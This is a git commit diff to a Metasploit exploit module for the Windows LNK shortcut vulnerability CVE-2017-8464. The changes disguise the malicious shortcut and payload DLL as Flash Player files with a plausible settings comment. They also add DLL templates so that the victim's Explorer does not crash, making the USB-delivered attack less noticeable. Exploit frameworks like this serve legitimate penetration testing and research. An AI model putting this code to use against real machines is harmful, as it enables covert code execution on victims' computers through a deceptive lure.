Added new DLL templates to prevent crashing of Explorer
parent
67dddd2402
commit
e51e1d9638
Binary file not shown.
Binary file not shown.
|
@ -59,8 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('FILENAME', [false, 'The LNK file']),
|
OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
|
||||||
OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
|
OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
|
||||||
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
|
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
|
||||||
])
|
])
|
||||||
|
|
||||||
|
@ -71,6 +71,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
opts = {}
|
||||||
|
if target['Arch'] == ARCH_X64
|
||||||
|
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
|
||||||
|
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x64_windows.dll')
|
||||||
|
else
|
||||||
|
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
|
||||||
|
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x86_windows.dll')
|
||||||
|
end
|
||||||
dll = generate_payload_dll
|
dll = generate_payload_dll
|
||||||
dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
|
dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
|
||||||
dll_path = store_file(dll, dll_name)
|
dll_path = store_file(dll, dll_name)
|
||||||
|
@ -102,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def generate_link(path)
|
def generate_link(path)
|
||||||
path << "\x00"
|
path << "\x00"
|
||||||
display_name = "Flash Player\x00" # LNK Display Name
|
display_name = "Flash Player\x00" # LNK Display Name
|
||||||
comment = "\x00"
|
comment = "Manage Flash Player Settings\x00"
|
||||||
|
|
||||||
# Control Panel Applet ItemID with our DLL
|
# Control Panel Applet ItemID with our DLL
|
||||||
cpl_applet = [
|
cpl_applet = [
|
||||||
|
|
Loading…
Reference in New Issue